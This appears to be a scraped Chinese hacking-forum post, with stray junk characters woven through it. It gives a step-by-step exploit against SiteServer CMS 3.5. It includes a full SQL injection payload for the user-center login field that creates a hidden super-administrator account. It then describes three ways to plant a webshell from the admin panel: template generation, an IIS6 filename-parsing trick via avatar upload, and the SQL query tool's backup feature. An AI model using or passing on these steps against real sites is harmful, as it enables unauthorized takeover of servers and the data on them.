经测试秒杀最新的3.5版
& Y# K: ^" D# H2 I, g9 ?( |stieserver官网:www.siteserver.cn" n: F8 g; r% K/ m! w1 g
EXP:7 E' v6 E1 w$ o4 m& c N: i
直接访问UserCenter/login.aspx. Z& Y- A+ h" v5 |) O7 w7 @
用户名处输入:
. K4 Q. c/ g- B$ o/ g7 N
; `+ I1 v) t; U123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
a1 f2 V4 i4 h' d6 H. }密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。7 A$ l8 C: A+ I' o
之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ P9 J! c! u/ {3 ]" I. t后台拿webshell的三种方法:. | Z; i+ t5 L& Z& u8 v
一、
6 W v1 G: s! h% s; R. W4 q站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx, A; k- S: Z7 A) i
二、
\4 B/ m$ [( E成员权限-》添加用户-》用户名为:1.asp# j2 L5 I! Q6 v8 q. G
http://127.0.0.1/usercenter/
- Y) l! @$ Y8 ^. Z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
; W+ ]! v9 N* R3 m(ps:后台添加用户时不会验证是否含有非法字符)) g3 J9 {: S7 r
三、8 Q0 G( }3 O' W! O
系统工具-》实用工具-》机器参数查看! {/ k3 Y* s6 N) f' O1 J
可以看到数据库类型、名称,WEB路径
- q4 N. _& D4 Z' x1 b) n) t系统工具-》数据库工具-》SQL语句查询3 M1 E" y: k+ t/ d
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |